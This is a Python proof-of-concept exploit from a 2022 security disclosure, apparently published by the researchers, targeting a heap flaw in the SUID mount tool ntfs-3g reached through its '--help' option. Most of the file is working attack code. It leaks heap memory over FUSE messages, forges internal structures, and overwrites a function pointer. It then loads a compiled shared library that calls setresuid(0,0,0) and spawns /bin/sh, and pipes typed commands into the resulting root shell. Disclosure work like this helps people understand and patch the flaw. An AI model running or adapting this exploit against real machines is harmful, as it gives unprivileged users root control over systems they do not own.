#!/usr/bin/python3 -BbbEIsSttW all
"""This software is provided by the copyright owner "as is"
and WITHOUT ANY EXPRESSED OR IMPLIED WARRANTIES, including,
but not limited to, the implied warranties of merchantability
and fitness for a particular purpose are disclaimed. In no
event shall the copyright owner be liable for any direct,
indirect, incidential, special, exemplary or consequential
damages, including, but not limited to, procurement of substitute
goods or services, loss of use, data or profits or business
interruption, however caused and on any theory of liability,
whether in contract, strict liability, or tort, including
negligence or otherwise, arising in any way out of the use
of this software, even if advised of the possibility of such
damage.

Copyright (c) 2022 Unparalleled IT Services e.U.
https://unparalleled.eu/blog/2022/20220607-help-to-heap-suid-privilege-escalation/

The software is only provided for reference to ease understanding
and fixing of an underlying security issue in "ntfs-3g".
Therefore it may NOT be distributed freely while the security
issue is not fixed and patched software is available widely.
After that phase permission to use, copy, modify, and distribute
this software according to GNU Lesser General Public License
(LGPL-3.0) purpose is hereby granted, provided that the above
copyright notice and this permission notice appear in all
copies.

This program demonstrates how to expoit the userspace file
system mount tool "ntfs-3g" using the "--help" option."""


import os
import socket
import struct
import subprocess
import sys
import time


def buildFuseHeader(command, nodeId):
  """Build the 40 byte fuse header."""
  return (
      b'\x00\x00\x00\x00' + struct.pack('<I', command) + \
      b'AAAAAAAA' + struct.pack('<Q', nodeId) + \
      b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00qqqq')

def unpackLong(data, offset):
  """Convencience method to unpack a long value from memory at
  given location."""
  return struct.unpack('<Q', data[offset:offset+8])[0]

def packLong(value):
  return struct.pack('<Q', value)

def getMem(memData, memStart, address, length):
  """Convenience method to get memory at a given address from
  a block of memory.
  @param memData the memory data block.
  @param memStart the start address of the memory data block.
  @param address the address to extract data from.
  @param length the length of data to extract."""
  offset = address - memStart
  if (offset < 0) or (offset + length > len(memData)):
    return None
  return memData[offset:offset + length]


class ExploitContext:
  def __init__(self):
# This is the socket used by ntfs-3g to perform fuse protocol communication.
    self.fuseSocket = None
# Keep the reference to one file for truncating and writing,
# see readMemory().
    self.fileNodeId = None
    self.heapReadDirHandleAddress = None
    self.heapReadDirContentAddress = None
    self.heapReadDirContentOffset = None
    self.heapStartAddess = None
    self.heapData = None
    self.fuseStructAddress = None
    self.ntfs3gProcess = None
# This table stores the file names with suitable inode numbers.
    self.inodeTable = None

  def ntfs3gInit(self):
    if self.ntfs3gProcess is not None:
      raise Exception()
    self.fuseSocket, childSocket = socket.socketpair()
    self.ntfs3gProcess = subprocess.Popen(
        ['/bin/ntfs-3g', '-o', '--help,no_detach', 'image', 'mnt'],
        stdin=childSocket.fileno())
    childSocket.close()

  def ntfs3gClose(self):
    self.fuseSocket.close()
    self.fuseSocket = None
    self.ntfs3gProcess.wait()
    self.ntfs3gProcess = None

  def lookupNode(self, name):
    """Lookup, return nodeid"""
# FUSE_LOOKUP 1
    self.fuseSocket.send(buildFuseHeader(1, 1) + name + b'\x00')
    result = self.fuseSocket.recv(1<<16)
    if len(result) == 16:
      return None
    return unpackLong(result, 16)

  def truncateNode(self, nodeId, length):
# FUSE_SETATTR 4
    self.fuseSocket.send(
        buildFuseHeader(4, nodeId) +
        b'\x08\x00\x00\x00\x00\x00\x00\x00' + b'\x00' * 8 + packLong(length))
    self.fuseSocket.recv(1<<16)

# FUSE_MKDIR 9
  def fuseMkdir(self, nodeId, name):
    self.fuseSocket.send(
        buildFuseHeader(9, nodeId) +
        b'\x00\x00\x00\x00\x00\x00\x00\x00' + name + b'\x00')
    return self.fuseSocket.recv(1<<16)[16:]

# FUSE_RMDIR 11
  def rmdir(self, nodeId, name):
    self.fuseSocket.send(
        buildFuseHeader(0xb, nodeId) + name + b'\x00')
    return self.fuseSocket.recv(1<<16)

  def writeNode(self, nodeId, offset, length, data):
# FUSE_WRITE 16
    if len(data) < length:
      raise Exception()
    self.fuseSocket.send(
        buildFuseHeader(0x10, nodeId) + \
        b'\xff\x00\x00\x00\x00\x00\x00\x00' + \
        struct.pack('<QQ', offset, length) + data)
    return self.fuseSocket.recv(1<<16)

  def fuseSetXAttr(self, nodeId):
    """Set the system.ntfs_object_id=ABC extended attribute on
    the given node."""
# FUSE_SETXATTR 21
    self.fuseSocket.send(
        buildFuseHeader(0x15, nodeId) + \
        b'BBBB' + b'\x00' * 4 + b'system.ntfs_object_id\x00' + b'ABC' * 0x40 + b'\x00')
    print('FUSE_SETXATTR result %s' % repr(self.fuseSocket.recv(1<<16)))

  def fuseInit(self):
# FUSE_INIT 26
    self.fuseSocket.send(
        buildFuseHeader(0x1a, 0) + b'\x08\x00\t\x00')
    print('Result %s' % repr(self.fuseSocket.recv(1<<16)))

  def openDir(self, nodeId):
# FUSE_OPENDIR 27
    self.fuseSocket.send(
        buildFuseHeader(0x1b, nodeId))
    fuseReply = self.fuseSocket.recv(1<<16)
    return unpackLong(fuseReply, 16)

  def fuseReadDir(self, nodeId, dirHandleAddress, offset, length):
# FUSE_READDIR 28
    self.fuseSocket.send(
        buildFuseHeader(0x1c, nodeId) + \
        struct.pack('<qqq', dirHandleAddress, offset, length))
    return self.fuseSocket.recv(1<<16)[16:]

  def fuseCreate(self, name, dirNodeId):
    """Create a file on the image."""
# FUSE_CREATE 35:
    self.fuseSocket.send(
        buildFuseHeader(0x23, dirNodeId) + \
        b'\xff\x05\x00\x00\xa4\x81\x00\x00' + name + b'\x00')
    print('FUSE_CREATE result %s' % repr(self.fuseSocket.recv(1<<16)))

  def buildInodeTable(self, path):
    """Build a table containing one entry per inode LSB."""
    dirNodeId = self.lookupNode(path)
    nodeDict = {}
    nameId = 0
    while len(nodeDict) != 0x100:
      nodeId = self.lookupNode(b'%s/%x' % (path, nameId))
      if nodeId is None:
        self.fuseMkdir(dirNodeId, b'%x' % nameId)
        nodeId = self.lookupNode(b'%s/%x' % (path, nameId))
      inodeInfo = self.fuseReadDir(
          nodeId, self.heapReadDirHandleAddress, 0, 0x400)
      if inodeInfo[0] not in nodeDict:
        nodeDict[inodeInfo[0]] = nameId
      nameId += 1
    self.inodeTable = [nodeDict[x] for x in range(0, 256)]

  def readHeap(self):
    heapData = self.fuseReadDir(
        1, self.heapReadDirHandleAddress,
        0 - self.heapReadDirContentOffset, self.heapReadDirContentOffset)
    return heapData

  def readMemory(self, address, length, readOffset=1, nodeId=1):
    """@param readOffset when not 0, only read is performed.
    Otherwise memory may be overwritten first.
    @param nodeId the directory node ID to read from."""
    if self.fuseStructAddress is None:
      raise Exception()

# Build a fake "struct fuse_dh" entry.
    fakeDirData = b'\x00' * 0x28 + packLong(self.fuseStructAddress) + \
        b'\x00' * 8 + packLong(address - readOffset) + \
        struct.pack(
            '<IIIIQQ', length + readOffset, length + readOffset,
            0, readOffset, 0, 0)
    self.truncateNode(self.fileNodeId, 0)
    self.writeNode(self.fileNodeId, 0x40, 0x80, fakeDirData + (b'A' * 0x80))

    allMem = self.readHeap()
    writeDataOffset = allMem.find(fakeDirData)
    if writeDataOffset == -1:
      raise Exception('No readback')
    writeDataAddress = self.heapStartAddess + writeDataOffset
    memData = self.fuseReadDir(
        nodeId, writeDataAddress, readOffset, length)
    return memData


  def getDirHandleMemory(self, dirHandleAddress):
    memStart = None
    contentAddress = None
    nextStep = 0x4000
    memData = realDirData = self.fuseReadDir(1, dirHandleAddress, 0, 0x400)
# Do not block, we will not see any response for invalid memory
# addresses.
    self.fuseSocket.setblocking(False)
    offset = -nextStep
    while nextStep != 0:
      self.fuseSocket.send(
          buildFuseHeader(0x1c, 1) + \
          struct.pack('<qqq', dirHandleAddress, offset, 0x100) + \
          b'\x01\x00\x00\x00AAAAAAAAAAA')
# Sleep a little while.
      time.sleep(0.1)
      dirData = b''
      try:
        dirData = self.fuseSocket.recv(1<<16)[16:]
      except:
        pass
      if dirData == b'':
        delta = int((nextStep + 1) / 2)
        offset += delta
        nextStep -= delta
        continue
      if dirData == realDirData:
# We reread the real directory data from the NTFS image, this
# should never happen here.
        raise Exception('Unexpected memory state')
      if len(dirData) < nextStep:
        print('Wrong length read %d vs %d' % (len(dirData), nextStep))
        continue
      memData = dirData[:nextStep] + memData
      memStart = offset
      offset -= nextStep

    self.fuseSocket.setblocking(True)
    print('* returning 0x%x bytes' % len(memData))
    for pos in range(0, len(memData) - 7):
      contentAddress = unpackLong(memData, pos)
# If this directory entry is the one we are using for reading,
# then the offset has to be the difference between the contentAddress
# and this position. 0x38 is the contentAddress field offset
# in the directory structure.
      testAddress = contentAddress + offset + pos - 0x38
      if testAddress == dirHandleAddress:
        print('Maybe struct match dir 0x%x with content 0x%x test 0x%x' % (
            dirHandleAddress, contentAddress, testAddress))
        return (contentAddress + memStart, contentAddress, memData)
    return (memStart, None, memData)

  def writeMemory(self, targetAddress, targetData):
    """Write targetData plus a short tail to the given address."""
    while targetData:
      nodeId = self.lookupNode(b'Dir/%x' % self.inodeTable[targetData[0]])
# This memory read will first write the data in "fuse_add_dirent"
# as readOffset is 0.
      self.readMemory(targetAddress, 0x40, 0, nodeId=nodeId)
      targetAddress += 1
      targetData = targetData[1:]


  def initExploit(self):
    """Initialize the directory structure, NTFS image and helper
    library to run the exploit. The exploit has to be run with
    the working directory writable by the current user."""
    if not os.path.exists('mnt'):
      os.mkdir('mnt')

    if os.path.exists('image'):
      os.unlink('image')

    iFile = open('image', 'wb')
    iFile.write(b'\x00' * (1 << 21))
    iFile.close()
    subprocess.check_call([
        '/bin/sh', '-c',
        '/sbin/mkfs.ntfs --force image && /bin/ntfs-3g image mnt && ' + \
            'mkdir mnt/Dir && touch mnt/File && umount mnt'])

# Rebuild the helper library.
    if os.path.exists('/tmp/s.so'):
      os.unlink('/tmp/s.so')
    subprocess.run(
        'gcc -Wall -fPIC -x c -o s.o -c -'.split(' '),
        check=True,
        input=bytes("""#define _GNU_SOURCE
#include <unistd.h>
extern void _init() {
    setresuid(0, 0, 0);
    char* args[2];
    args[0]="/bin/sh";
    args[1]=NULL;
    execve(args[0], args, NULL);
}""", 'ascii'))
    subprocess.check_call(
        'ld -shared -Bdynamic s.o -o /tmp/s.so'.split(' '))
# This is the first run, so build the inode table without really
# executing the payload.
    self.runExploit()


  def runExploit(self):
    """Run the exploit code. This requires an appropriate NTFS
    image with crafted inode numbers to be available. If the
    image is not ready yet, all required inodes are created and
    the function terminates without attempting exploitation as
    after those operations the heap is in a really bad shape."""
    self.ntfs3gInit()
    self.fuseInit()

# Have a file node reference for heap spraying.
    self.fileNodeId = self.lookupNode(b'File')

# Massage the heap to appropriate shape.
    self.fuseSetXAttr(self.fileNodeId)
    self.fuseCreate(b'XXXYYYYY', 1)

    self.heapReadDirHandleAddress = dirHandleAddress = self.openDir(1)
    print('OPENDIR: Address dirhandle 0x%x' % dirHandleAddress)
    self.fuseReadDir(1, dirHandleAddress, 0, 0x4000)

    if self.inodeTable is None:
      self.buildInodeTable(b'Dir')
      self.ntfs3gClose()
      return

    memStart, contentAddress, memData = self.getDirHandleMemory(
        dirHandleAddress)
    print(
        'Assuming heap start at 0x%x with 0x%x bytes data extracted' % (
            memStart, len(memData)))
    if contentAddress is None:
      raise Exception()
    dirStructOffset = dirHandleAddress - memStart
    dirStructData = memData[dirStructOffset:dirStructOffset+0x60]
    fuseStructAddress = unpackLong(dirStructData, 0x28)

    self.heapReadDirContentAddress = contentAddress
    self.heapReadDirContentOffset = contentAddress - memStart
    self.heapStartAddess = memStart
    self.heapData = memData
    self.fuseStructAddress = fuseStructAddress

    fuseFsAddress = unpackLong(
        getMem(memData, memStart, fuseStructAddress, 0x110), 0x108)
    print('Got fuse_fs address 0x%x.' % fuseFsAddress)

    mknodFunctionAddress = unpackLong(
        getMem(memData, memStart, fuseFsAddress, 0x80), 0x10)
    print('Got mknod op: 0x%x' % mknodFunctionAddress)
    mknodFunctionPtrAddress = fuseFsAddress + 0x10
    checkData = self.readMemory(mknodFunctionPtrAddress, 0x8)
    if checkData != packLong(mknodFunctionAddress):
      raise Exception()

    selectReparsePluginAddress = packLong(mknodFunctionAddress + 0x14b7)
    self.writeMemory(
        mknodFunctionPtrAddress, selectReparsePluginAddress)
    checkData = self.readMemory(mknodFunctionPtrAddress, 0x8)
    if selectReparsePluginAddress != checkData:
      raise Exception('Update to function address failed')
# Finally call mknod and load the shared library.
# FUSE_MKNOD 8
    self.fuseSocket.send(
        buildFuseHeader(0x8, 1) + \
        b'\xff\x05\x00\x00\xa4\x81\x00\x00' + b'tmp/s.so\x00')

# The privileged process is just a subprocess of this process
# so forward our stdin data to it.
    print('Type shell commands:')
    while True:
      try:
        line = sys.stdin.readline()
        self.fuseSocket.send(bytes(line, 'utf-8'))
      except BrokenPipeError:
        self.ntfs3gClose()
        break




def main():
  """This is the program main function."""
  context = ExploitContext()
  context.initExploit()
  context.runExploit()

if __name__ == '__main__':
  main()
